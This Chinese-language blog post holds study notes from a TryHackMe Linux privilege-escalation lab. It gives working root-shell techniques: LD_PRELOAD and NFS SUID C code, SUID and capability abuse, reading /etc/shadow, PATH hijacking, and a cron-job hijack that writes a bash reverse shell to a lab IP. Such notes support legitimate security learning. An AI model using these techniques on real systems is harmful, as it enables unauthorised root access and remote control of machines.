<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=ZCOOL XiaoWei:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"czchenzhan.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":10,"unescape":true,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"./public/search.xml"};
  </script>

  <meta name="description" content="知识点记录&emsp;&emsp;此文用于记录学习 TryHackMe 网站中 Room: Linux Privilege Escalation 获得的知识点。ƪ(˘⌣˘)ʃ">
<meta property="og:type" content="article">
<meta property="og:title" content="TryHackMe-LinuxPrivilegeEscalation">
<meta property="og:url" content="https://czchenzhan.github.io/2025/04/21/TryHackMe-LinuxPrivilegeEscalation/index.html">
<meta property="og:site_name" content="陈展的博客">
<meta property="og:description" content="知识点记录&emsp;&emsp;此文用于记录学习 TryHackMe 网站中 Room: Linux Privilege Escalation 获得的知识点。ƪ(˘⌣˘)ʃ">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-04-20T16:00:00.000Z">
<meta property="article:modified_time" content="2025-09-09T00:39:52.277Z">
<meta property="article:author" content="作者：陈展">
<meta property="article:tag" content="TryHackMe Learning">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://czchenzhan.github.io/2025/04/21/TryHackMe-LinuxPrivilegeEscalation/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>TryHackMe-LinuxPrivilegeEscalation | 陈展的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">陈展的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">记录点滴</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://czchenzhan.github.io/2025/04/21/TryHackMe-LinuxPrivilegeEscalation/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="作者：陈展">
      <meta itemprop="description" content="欢迎到访">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="陈展的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          TryHackMe-LinuxPrivilegeEscalation
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-04-21 00:00:00" itemprop="dateCreated datePublished" datetime="2025-04-21T00:00:00+08:00">2025-04-21</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-09-09 08:39:52" itemprop="dateModified" datetime="2025-09-09T08:39:52+08:00">2025-09-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web-Security/" itemprop="url" rel="index"><span itemprop="name">Web Security</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="知识点记录"><a href="#知识点记录" class="headerlink" title="知识点记录"></a>知识点记录</h1><p>&emsp;&emsp;此文用于记录学习 TryHackMe 网站中 Room: Linux Privilege Escalation 获得的知识点。ƪ(˘⌣˘)ʃ</p>
<span id="more"></span>

<!-- toc -->

<h2 id="权限提升概述"><a href="#权限提升概述" class="headerlink" title="权限提升概述"></a>权限提升概述</h2><p>&emsp;&emsp;权限提升即通过系统或应用程序中的漏洞，从较低权限的帐户转到较高权限的帐户</p>
<h2 id="通过内核漏洞提升权限"><a href="#通过内核漏洞提升权限" class="headerlink" title="通过内核漏洞提升权限"></a>通过内核漏洞提升权限</h2><p>&emsp;&emsp;<code>内核漏洞利用方法</code>：在确定当前 Linux 的的内核版本后，可以通过搜索并查找目标系统内核版本的漏洞利用代码，利用某些可行漏洞</p>
<p>&emsp;&emsp;<code>如何搜索现有漏洞利用代码</code>：Google 搜索；<a target="_blank" rel="noopener" href="https://www.cvedetails.com/">CVEdetails.com</a>；Exploit-db 搜索；searchsploit 搜索</p>
<p>&emsp;&emsp;以下是做题时学到的知识点</p>
<p>&emsp;&emsp;<code>Linux主机之间传送文件</code>：发送方使用命令<code>python -m http.server</code>，开放端口；接收方使用<code>wget</code>指令进行下载：<code>wget http://&lt;ip of sender&gt;:8000/&lt;filename&gt;</code></p>
<p>&emsp;&emsp;<code>CVE-2015-1328漏洞</code>：需求 Ubuntu 内核版本 3.13 至 3.19.0-21.21；影响的 Ubuntu 版本包括 Ubuntu 12.04&#x2F;14.04&#x2F;14.10&#x2F;15.04；可实现本地非特权用户获得 root 权限，公开的漏洞利用代码在此ƪ(˘⌣˘)ʃ   &#x3D;&gt;  <a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/37292">CVE-2015-1328漏洞利用代码</a></p>
<h2 id="通过设置LD-PRELOAD-生成具有root权限的shell"><a href="#通过设置LD-PRELOAD-生成具有root权限的shell" class="headerlink" title="通过设置LD_PRELOAD 生成具有root权限的shell"></a>通过设置LD_PRELOAD 生成具有root权限的shell</h2><p>&emsp;&emsp;<code>前提条件</code>：非特权用户在一些程序上拥有 sudo 权限，可以以 root 权限运行该程序；sudo 权限配置允许保留 <code>LD_PRELOAD</code> 环境变量，即<code>/etc/sudoers</code> 文件中包含如下配置：<code>Defaults env_keep += LD_PRELOAD</code>；Linux 安装了 gcc，使得其可以编译并运行 C 程序</p>
<p>&emsp;&emsp;<code>具体步骤</code></p>
<p>&emsp;&emsp;第一步，我们需要编写如下的 C 代码，这些代码的作用是使得进程在获取 uid 时返回 0，即 root 用户的 uid，实现提权(这里我准备了两段，第二段使用时需要在 shell.c 目录下)</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 第一段</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> _init() &#123;</span><br><span class="line">    unsetenv(<span class="string">&quot;LD_PRELOAD&quot;</span>);</span><br><span class="line">    setgid(<span class="number">0</span>);</span><br><span class="line">    setuid(<span class="number">0</span>);</span><br><span class="line">    system(<span class="string">&quot;/bin/bash&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 第二段</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">uid_t</span> <span class="title function_">getuid</span><span class="params">(<span class="type">void</span>)</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;第二步，使用 gcc 将 shell.c 编译为共享库，指令为<code>gcc -fPIC -shared -o shell.so shell.c [-nostartfiles]</code></p>
<p>&emsp;&emsp;最后，使用<code>sudo LD_PRELOAD=./shell.so &lt;命令&gt;</code>，基于此技术可以使用的命令能够通过<code>sudo -l</code>得知</p>
<h2 id="利用SUID文件进行权限提升"><a href="#利用SUID文件进行权限提升" class="headerlink" title="利用SUID文件进行权限提升"></a>利用SUID文件进行权限提升</h2><p>&emsp;&emsp;<code>SUID</code>：SUID 是一种特殊的文件权限设置，允许普通用户以文件所有者(也可以使用 SGID，文件所有者所在组)的身份执行该文件；如果某个可执行文件设置了 SUID 位，并且该文件的所有者是 root 用户，那么普通用户在执行该文件时，将以 root 权限运行该程序</p>
<p>&emsp;&emsp;<code>具体步骤</code></p>
<p>&emsp;&emsp;第一步，通过命令<code>find / -type f -perm -04000 -ls 2&gt;/dev/null</code>找出所有被设置了 SUID 的可执行文件，观察是否有可以利用的命令</p>
<p>&emsp;&emsp;第二步，根据可以使用的命令，查看<code>/etc/shadow</code>和<code>/etc/passwd</code>，根据可以执行的指令，选择破解某账户的密码或新增 root 权限用户</p>
<p>&emsp;&emsp;<code>习题知识点</code>：如果 Linux 主机为<code>base64</code>指令设置了 SUID，则可基于此查看<code>/etc/shadow</code>和<code>/etc/passwd</code>并通过 base64 解码得到所有用户的账号及密码</p>
<h2 id="利用Capabilities属性进行权限提升"><a href="#利用Capabilities属性进行权限提升" class="headerlink" title="利用Capabilities属性进行权限提升"></a>利用Capabilities属性进行权限提升</h2><p>&emsp;&emsp;<code>Capabilities属性</code>：为特定二进制文件赋予的属性，在不给予非特权用户 sudo 权利的同时满足其使用该文件进行 root 权限才能办到的事</p>
<p>&emsp;&emsp;<code>具体步骤</code></p>
<p>&emsp;&emsp;第一步，使用命令筛选出被设置了 Capabilities 属性的文件：<code>getcap -r / 2&gt;/dev/null</code></p>
<p>&emsp;&emsp;根据结果，查找提权点，并编写相应代码(可使用<a target="_blank" rel="noopener" href="https://gtfobins.github.io/">GTFObins</a>辅助)使用户获取 root 权限，比如下例</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash"><span class="built_in">getcap</span> -r / 2&gt;/dev/null</span></span><br><span class="line">/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep</span><br><span class="line">/usr/bin/traceroute6.iputils = cap_net_raw+ep</span><br><span class="line">/usr/bin/mtr-packet = cap_net_raw+ep</span><br><span class="line">/usr/bin/ping = cap_net_raw+ep</span><br><span class="line">/home/karen/vim = cap_setuid+ep</span><br><span class="line">/home/ubuntu/view = cap_setuid+ep</span><br><span class="line"></span><br><span class="line">=&gt; 观察到vim指令存在setuid操作有设置Capabilities，利用此，可以编写代码，使本用户 uid=0 &lt;=&gt; root</span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">vim -c <span class="string">&#x27;:!sh&#x27;</span></span></span><br><span class="line"></span><br><span class="line">=&gt; 这会打开一个root shell，接下来就可以为所欲为了</span><br></pre></td></tr></table></figure>

<h2 id="修改root定时任务进行权限提升"><a href="#修改root定时任务进行权限提升" class="headerlink" title="修改root定时任务进行权限提升"></a>修改root定时任务进行权限提升</h2><p>&emsp;&emsp;<code>Cron Jobs</code>：是一种定时执行的可执行文件，默认运行权限同其任务设定的所有者相同；所有的这类可执行文件的配置被存于<code>/etc/crontab</code>文件中，该文件可被所有人读取</p>
<p>&emsp;&emsp;<code>具体流程</code></p>
<p>&emsp;&emsp;第一步，使用可以使用的查看命令，查看<code>/etc/crontab</code></p>
<p>&emsp;&emsp;第二步，找到可以利用的提权点；比如，由 root 用户设置的，定时执行某可执行文件的指令，而目标文件可被非特权用户改写或被删除</p>
<p>&emsp;&emsp;最后，基于上述条件，对指定的文件进行改写，比如通过使用如下 shell，可实现攻击机对受害机以 root 权限实施的操控</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">=&gt; 受害机</span><br><span class="line">echo &#x27;#!/bin/bash&#x27; &gt; /home/karen/backup.sh</span><br><span class="line">echo &#x27;bash -i &gt;&amp; /dev/tcp/10.10.14.5/4444 0&gt;&amp;1&#x27; &gt;&gt; /home/karen/backup.sh</span><br><span class="line">chmod +x /home/karen/backup.sh</span><br><span class="line"></span><br><span class="line">=&gt; 攻击机</span><br><span class="line">nc -lvnp 4444</span><br></pre></td></tr></table></figure>

<h2 id="利用PATH环境变量进行权限提升"><a href="#利用PATH环境变量进行权限提升" class="headerlink" title="利用PATH环境变量进行权限提升"></a>利用PATH环境变量进行权限提升</h2><p>&emsp;&emsp;<code>PATH</code>：Linux中的环境变量设置，对于未内置于 shell 中或未使用绝对路径定义的任何命令，Linux 将在 PATH 下定义的文件夹中进行搜索</p>
<p>&emsp;&emsp;<code>具体步骤</code>：如下表依次进行</p>
<table>
<thead>
<tr>
<th>步骤</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>查找可写目录</td>
<td>&#96;find &#x2F; -type d -writable 2&gt;&#x2F;dev&#x2F;null</td>
</tr>
<tr>
<td>检查 PATH</td>
<td><code>echo $PATH</code></td>
</tr>
<tr>
<td>添加可控目录到 PATH</td>
<td><code>export PATH=/tmp:$PATH</code></td>
</tr>
<tr>
<td>放置恶意二进制</td>
<td><code>/tmp/thm</code></td>
</tr>
<tr>
<td>执行目标脚本或程序</td>
<td>执行含未使用绝对路径调用命令的 SUID 程序</td>
</tr>
<tr>
<td>提权成功</td>
<td>获取 root shell 或读取敏感文件</td>
</tr>
</tbody></table>
<h2 id="利用NFS进行权限提升"><a href="#利用NFS进行权限提升" class="headerlink" title="利用NFS进行权限提升"></a>利用NFS进行权限提升</h2><p>&emsp;&emsp;<code>NFS</code>：是一种网络文件系统协议，允许用户通过网络访问远程主机上的文件，其配置保存于<code>/etc/exports</code>文件中</p>
<p>&emsp;&emsp;<code>NFS的工作原理</code>：对服务器端，需配置并导出某个目录供客户端挂载；对客户端，将远程目录挂载到客户端某个目录，然后就可以像访问本地文件一样访问远程数据</p>
<p>&emsp;&emsp;<code>NFS配置记录解读</code>：以下直接使用 ChatGPT 4o 给出的回复，<code>&lt;共享目录路径&gt; &lt;允许IP&gt;(&lt;选项1&gt;,&lt;选项2&gt;,...)</code></p>
<h4 id="📌-客户端标识方式（前缀部分）"><a href="#📌-客户端标识方式（前缀部分）" class="headerlink" title="📌 客户端标识方式（前缀部分）"></a>📌 客户端标识方式（前缀部分）</h4><p>&emsp;&emsp;你可以指定哪些客户端有权限访问，比如：</p>
<table>
<thead>
<tr>
<th>客户端标识</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td><code>*</code></td>
<td>所有主机（不安全）</td>
</tr>
<tr>
<td><code>192.168.1.100</code></td>
<td>指定某个 IP</td>
</tr>
<tr>
<td><code>192.168.1.0/24</code></td>
<td>指定一个子网</td>
</tr>
<tr>
<td><code>client.example.com</code></td>
<td>通过主机名识别</td>
</tr>
</tbody></table>
<hr>
<h4 id="🧩-常用选项说明（括号内的部分）"><a href="#🧩-常用选项说明（括号内的部分）" class="headerlink" title="🧩 常用选项说明（括号内的部分）"></a>🧩 常用选项说明（括号内的部分）</h4><h5 id="📖-读写权限控制"><a href="#📖-读写权限控制" class="headerlink" title="📖 读写权限控制"></a>📖 读写权限控制</h5><table>
<thead>
<tr>
<th>选项</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td><code>ro</code></td>
<td>只读权限（Read Only）</td>
</tr>
<tr>
<td><code>rw</code></td>
<td>读写权限（Read and Write）</td>
</tr>
</tbody></table>
<blockquote>
<p>🚨 通常为了安全，建议尽量使用 <code>ro</code>，除非真的需要写权限。</p>
</blockquote>
<hr>
<h5 id="🧍-用户权限映射（身份映射）"><a href="#🧍-用户权限映射（身份映射）" class="headerlink" title="🧍 用户权限映射（身份映射）"></a>🧍 用户权限映射（身份映射）</h5><table>
<thead>
<tr>
<th>选项</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td><code>root_squash</code></td>
<td>把客户端的 root 映射为低权限用户（默认行为）</td>
</tr>
<tr>
<td><code>no_root_squash</code></td>
<td>客户端的 root 保持 root 身份（⚠️ 极高危）</td>
</tr>
<tr>
<td><code>all_squash</code></td>
<td>把<strong>所有用户</strong>都映射成匿名用户（适合匿名只读共享）</td>
</tr>
<tr>
<td><code>anonuid=UID</code></td>
<td>设置匿名用户的 UID（配合 squash）</td>
</tr>
<tr>
<td><code>anongid=GID</code></td>
<td>设置匿名用户的 GID</td>
</tr>
</tbody></table>
<blockquote>
<p>✅ <code>root_squash</code> 是默认也是推荐的，<code>no_root_squash</code> 是危险操作，应避免使用。</p>
</blockquote>
<hr>
<h5 id="💾-同步与性能选项"><a href="#💾-同步与性能选项" class="headerlink" title="💾 同步与性能选项"></a>💾 同步与性能选项</h5><table>
<thead>
<tr>
<th>选项</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td><code>sync</code></td>
<td>所有数据操作同步写入磁盘后才响应，数据更安全（推荐）</td>
</tr>
<tr>
<td><code>async</code></td>
<td>提前响应写入请求，性能更好但数据可能丢失（不推荐）</td>
</tr>
</tbody></table>
<hr>
<h5 id="📁-子目录检查"><a href="#📁-子目录检查" class="headerlink" title="📁 子目录检查"></a>📁 子目录检查</h5><table>
<thead>
<tr>
<th>选项</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td><code>subtree_check</code></td>
<td>检查子目录权限是否符合导出要求（默认，稍慢）</td>
</tr>
<tr>
<td><code>no_subtree_check</code></td>
<td>不做子目录权限检查（性能更好，推荐）</td>
</tr>
</tbody></table>
<hr>
<h5 id="💡-其他高级选项（可选）"><a href="#💡-其他高级选项（可选）" class="headerlink" title="💡 其他高级选项（可选）"></a>💡 其他高级选项（可选）</h5><table>
<thead>
<tr>
<th>选项</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td><code>insecure</code></td>
<td>允许客户端使用 1024 以上的非特权端口连接（不推荐）</td>
</tr>
<tr>
<td><code>secure</code></td>
<td>只接受客户端从特权端口发起的请求（默认）</td>
</tr>
<tr>
<td><code>nohide</code></td>
<td>允许客户端查看挂载在共享目录下的其他文件系统</td>
</tr>
<tr>
<td><code>crossmnt</code></td>
<td>允许跨挂载点共享子目录</td>
</tr>
<tr>
<td><code>fsid=0</code> 或 <code>fsid=root</code></td>
<td>指定 NFSv4 的“根目录”，必须设置一个共享目录为根</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;<code>提权点所在</code>：NFS 默认会启用属性<code>root_squash</code>，把客户端上的 root 用户映射成一个低权限用户（通常是 <code>nfsnobody</code>），从而避免远程 root 用户在 NFS 服务器上获得特权</p>
<p>&emsp;&emsp;<code>具体步骤</code></p>
<p>&emsp;&emsp;第一步，在攻击机上查看目的机中可以挂载的共享文件夹，使用指令<code>showmount -e 目的机IP</code></p>
<p>&emsp;&emsp;第二步，在目的机中使用非特权用户读取<code>/etc/exports</code>，重点查看其中设置 no_root_squash 的文件夹</p>
<p>&emsp;&emsp;第三步，将选定的文件夹挂载到攻击机，使用指令<code>mount -o rw 目的机IP:所选文件夹路径 攻击机挂载路径</code></p>
<p>&emsp;&emsp;第四步，在攻击机挂载路径下创建脚本，内容可如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// nfs.c</span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">	setgid(<span class="number">0</span>);</span><br><span class="line">	setuid(<span class="number">0</span>);</span><br><span class="line">	system(<span class="string">&quot;/bin/bash&quot;</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;编译后，为该文件设置 SUID 属性，随后运行即可获取目的机 root 权限</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gcc nfs.c -0 nfs -w</span><br><span class="line">chmod  +s nfs</span><br><span class="line"></span><br><span class="line">=&gt; 目的机进行</span><br><span class="line">./nfs</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/TryHackMe-Learning/" rel="tag"># TryHackMe Learning</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/04/20/TryHackMe-NmapLiveHostDiscovery/" rel="prev" title="TryHackMe-NmapLiveHostDiscovery">
      <i class="fa fa-chevron-left"></i> TryHackMe-NmapLiveHostDiscovery
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/04/23/TryHackMe-WindowsPrivilegeEscalation/" rel="next" title="TryHackMe-LinuxPrivilegeEscalation">
      TryHackMe-LinuxPrivilegeEscalation <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%E8%AE%B0%E5%BD%95"><span class="nav-number">1.</span> <span class="nav-text">知识点记录</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%A6%82%E8%BF%B0"><span class="nav-number">1.1.</span> <span class="nav-text">权限提升概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%80%9A%E8%BF%87%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E6%8F%90%E5%8D%87%E6%9D%83%E9%99%90"><span class="nav-number">1.2.</span> <span class="nav-text">通过内核漏洞提升权限</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%80%9A%E8%BF%87%E8%AE%BE%E7%BD%AELD-PRELOAD-%E7%94%9F%E6%88%90%E5%85%B7%E6%9C%89root%E6%9D%83%E9%99%90%E7%9A%84shell"><span class="nav-number">1.3.</span> <span class="nav-text">通过设置LD_PRELOAD 生成具有root权限的shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8SUID%E6%96%87%E4%BB%B6%E8%BF%9B%E8%A1%8C%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-number">1.4.</span> <span class="nav-text">利用SUID文件进行权限提升</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8Capabilities%E5%B1%9E%E6%80%A7%E8%BF%9B%E8%A1%8C%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-number">1.5.</span> <span class="nav-text">利用Capabilities属性进行权限提升</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9root%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E8%BF%9B%E8%A1%8C%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-number">1.6.</span> <span class="nav-text">修改root定时任务进行权限提升</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8PATH%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E8%BF%9B%E8%A1%8C%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-number">1.7.</span> <span class="nav-text">利用PATH环境变量进行权限提升</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8NFS%E8%BF%9B%E8%A1%8C%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-number">1.8.</span> <span class="nav-text">利用NFS进行权限提升</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%F0%9F%93%8C-%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%A0%87%E8%AF%86%E6%96%B9%E5%BC%8F%EF%BC%88%E5%89%8D%E7%BC%80%E9%83%A8%E5%88%86%EF%BC%89"><span class="nav-number">1.8.0.1.</span> <span class="nav-text">📌 客户端标识方式（前缀部分）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" 